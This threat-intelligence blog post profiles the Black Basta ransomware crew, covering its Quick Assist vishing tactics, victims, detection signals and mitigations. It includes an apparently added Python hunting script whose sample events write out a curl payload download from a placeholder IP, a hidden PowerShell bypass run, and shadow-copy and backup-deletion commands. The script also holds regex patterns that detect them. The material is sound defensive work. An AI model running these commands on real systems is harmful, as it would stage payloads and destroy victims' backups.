BIPI

Black Basta: The Conti Spinoff That Made Quick Assist a Phishing Vector

Threat Intelligence

Black Basta inherited Conti's playbook and made it worse. The 2024 pivot to Microsoft Quick Assist social engineering shows a crew adapting faster than most defenders.

By Arjun Raghavan, Security & Systems Lead, BIPI · August 11, 2024 · 8 min read

#black-basta #ransomware #conti #threat-intelligence

Black Basta is the closest thing the post-Conti ecosystem has to a flagship operation. Active since April 2022, the crew has publicly claimed more than 500 victims, and blockchain analysis published in late 2023 traced at least $100 million in ransom payments to it. The 2024 evolution into Microsoft Quick Assist abuse is the kind of pivot defenders need to track in real time.

Actor Profile

Black Basta emerged in April 2022, weeks after the Conti chat leaks, and is widely assessed to be a Conti spinoff. Microsoft tracks the financially motivated group that deploys it as Storm-1811, the actor behind the 2024 Quick Assist campaign. Leaked internal chats (the 'ExploitWhispers' dump, later indexed as 'BlackBastaGPT') confirmed Russian-speaking operators and internal disputes; overlap with FIN7 tooling, including a custom EDR-evasion tool, had already been documented by SentinelOne in 2022.

Attribution caveat: Black Basta is a closed RaaS, not an open affiliate program. The number of operators is small relative to LockBit-era crews, which makes the leaked chats particularly valuable as ground truth.

TTPs

The 2022-2023 playbook was Qakbot/Qbot phishing into Cobalt Strike into network-wide encryption. The 2024 evolution shifted heavily into voice phishing and abuse of legitimate remote tools after Qakbot was disrupted by Operation Duck Hunt in August 2023.

  • Email bombing: thousands of newsletter signups to flood a victim's inbox so that a "help" call is welcome
  • Follow-up phone call from a fake IT support impersonator offering to help with the email storm
  • Social engineering victim into running Microsoft Quick Assist or AnyDesk and granting remote control
  • Drop of Cobalt Strike, Pikabot, or DarkGate loaders post-access
  • Exploitation of ConnectWise ScreenConnect (CVE-2024-1709 authentication bypass, chained with the CVE-2024-1708 path traversal) for initial access into MSP-managed estates
  • Backup destruction (Veeam, Datto), shadow copy deletion, BitLocker abuse, then file encryption with ChaCha20 and per-file keys wrapped with RSA-4096

Notable Victims

Ascension Health (May 2024, the highest-impact healthcare ransomware event of the year), Capita, Hyundai Europe, ABB, Dish Network, multiple US municipal governments, several large law firms, and Synlab Italia. Black Basta's healthcare targeting prompted a joint CISA, FBI, HHS, and MS-ISAC advisory in May 2024.

Quick Assist ships with every supported Windows client build. The adversary did not need an exploit. It needed a phone.

Detection Signals

The Quick Assist pivot is the most operationally important detection target. The legitimate use cases for the tool are narrow, and the abuse signature is clean.

  • quickassist.exe execution on endpoints with no IT-side ticket correlation
  • Sudden spike in inbound newsletter signup confirmations to a single user (precursor to vish)
  • Process tree: curl, certutil, or PowerShell launched in the same user session within 10 minutes of quickassist.exe starting. The parent is usually explorer.exe or cmd.exe rather than quickassist.exe, because the helper's injected keystrokes launch tools through the victim's own shell, so correlate on user and time rather than on a strict parent/child rule
  • Cobalt Strike beacon, Pikabot, or DarkGate loader execution following remote assistance session
  • vssadmin delete shadows, wbadmin delete catalog, or Veeam.Backup process termination
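The signals above as an added example that is not part of the original post and does not come from any vendor's detection content: a small Python hunt over constructed Sysmon-style process-creation events. It correlates Quick Assist starts with living-off-the-land tool launches by the same user inside a 10-minute window (user plus time, not strict parent/child, for the reason given in the process-tree signal), optionally suppresses users who have an open help-desk ticket, and flags backup-destruction command lines. The usernames, paths, timestamps, the `<ver>` placeholder in the Store package path and the 203.0.113.10 URL are all made up.

```python
"""Added example: hunting constructed Sysmon-style process-creation events
for the Quick Assist abuse chain. Not from the original post; all telemetry
below is fabricated for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# How long after QuickAssist.exe starts we treat tool launches as related.
QA_WINDOW = timedelta(minutes=10)

# Tools the remote "helper" typically runs once handed control.
SUSPICIOUS_TOOLS = {"curl.exe", "certutil.exe", "powershell.exe", "pwsh.exe",
                    "bitsadmin.exe", "mshta.exe"}

# Backup and shadow-copy destruction seen before encryption.
BACKUP_KILL_PATTERNS = [
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"\btaskkill\b.*\bveeam\.backup", re.I),
]

QA_PATH = r"C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_<ver>\QuickAssist.exe"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (one dict per process-creation event).
SAMPLE_EVENTS = [
    {"ts": "2024-05-14T09:02:11", "user": "CORP\\jdoe", "image": QA_PATH,
     "cmdline": "QuickAssist.exe"},
    {"ts": "2024-05-14T09:07:05", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o C:\ProgramData\kb.zip http://203.0.113.10/kb.zip"},
    {"ts": "2024-05-14T09:08:30", "user": "CORP\\jdoe", "image": PS_PATH,
     "cmdline": r"powershell -ep bypass -w hidden -f C:\ProgramData\kb.ps1"},
    {"ts": "2024-05-14T09:12:00", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-05-14T09:12:30", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\wbadmin.exe",
     "cmdline": "wbadmin delete catalog -quiet"},
    # Same user, 38 minutes later: outside the window, not flagged.
    {"ts": "2024-05-14T09:40:00", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil -hashfile C:\ProgramData\kb.zip SHA256"},
    # Different user with no Quick Assist session: not flagged.
    {"ts": "2024-05-14T10:15:00", "user": "CORP\\asmith", "image": PS_PATH,
     "cmdline": "powershell Get-Service"},
    # Employee with an open help-desk ticket: flagged only without ticket data.
    {"ts": "2024-05-14T11:00:00", "user": "CORP\\mlee", "image": QA_PATH,
     "cmdline": "QuickAssist.exe"},
    {"ts": "2024-05-14T11:03:00", "user": "CORP\\mlee", "image": PS_PATH,
     "cmdline": "powershell Get-EventLog -LogName System -Newest 50"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_quick_assist_abuse(events, ticketed_users=frozenset(), window=QA_WINDOW):
    """Flag SUSPICIOUS_TOOLS launched by a user within `window` after that
    user's QuickAssist.exe start, unless the user has an open ticket.
    Correlates on user + time, not parent PID: keystrokes the helper injects
    through Quick Assist start tools under explorer.exe/cmd.exe, so a strict
    QuickAssist.exe -> curl.exe parent rule would miss the chain."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    findings = []
    for user, evs in by_user.items():
        if user in ticketed_users:
            continue
        evs.sort(key=_ts)
        qa_starts = [_ts(e) for e in evs if _basename(e["image"]) == "quickassist.exe"]
        for e in evs:
            tool = _basename(e["image"])
            if tool not in SUSPICIOUS_TOOLS:
                continue
            t = _ts(e)
            for start in qa_starts:
                if start <= t <= start + window:
                    findings.append({"user": user, "tool": tool, "ts": e["ts"],
                                     "minutes_after_qa": (t - start).seconds // 60,
                                     "cmdline": e["cmdline"]})
                    break
    return findings


def find_backup_destruction(events):
    """Flag command lines matching the backup/shadow-copy destruction patterns."""
    return [{"user": e["user"], "ts": e["ts"], "cmdline": e["cmdline"]}
            for e in events
            if any(p.search(e["cmdline"]) for p in BACKUP_KILL_PATTERNS)]


if __name__ == "__main__":
    for f in find_quick_assist_abuse(SAMPLE_EVENTS, ticketed_users={"CORP\\mlee"}):
        print("QUICK ASSIST:", f)
    for f in find_backup_destruction(SAMPLE_EVENTS):
        print("BACKUP KILL:", f)
```

Run against the sample, jdoe's curl and PowerShell launches are flagged (4 and 6 minutes after Quick Assist), the certutil run 38 minutes later is not, and mlee's session is suppressed only when the ticket set is supplied; the vssadmin and wbadmin lines come back from the backup-destruction check regardless of any Quick Assist context, since they matter on their own.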

Defensive Controls

Most environments do not need Quick Assist enabled by default. That single policy change cuts the 2024 Black Basta initial-access vector cleanly.

  1. Disable or restrict Microsoft Quick Assist via Intune or AppLocker unless IT operations actively uses it. On Windows 11 it is a Store package (MicrosoftCorporationII.QuickAssist), so use a packaged-app rule or remove the package rather than relying on a path rule; on Windows 10 it is the App.Support.QuickAssist optional capability.
  2. Require IT support callbacks to originate from IT, not the user. Train staff that real IT will never cold-call about email floods.
  3. Patch ConnectWise ScreenConnect immediately on disclosure. The CVE-2024-1709/CVE-2024-1708 pair was being exploited in the wild within about 48 hours of the February 2024 advisory.
  4. Protect Veeam, Datto, and other backup management consoles with phishing-resistant MFA and separate credential boundaries.
  5. Hunt the indicators in the May 2024 joint advisory (AA24-131A) against retained logs monthly, and re-run the hunt whenever CISA updates it.

Black Basta is the operational template for the post-Conti ransomware market. The crew has shown it will rotate initial-access vectors aggressively when one is disrupted. Defenders who get ahead of the Quick Assist pivot now will be better positioned for whatever the 2025 vector becomes.
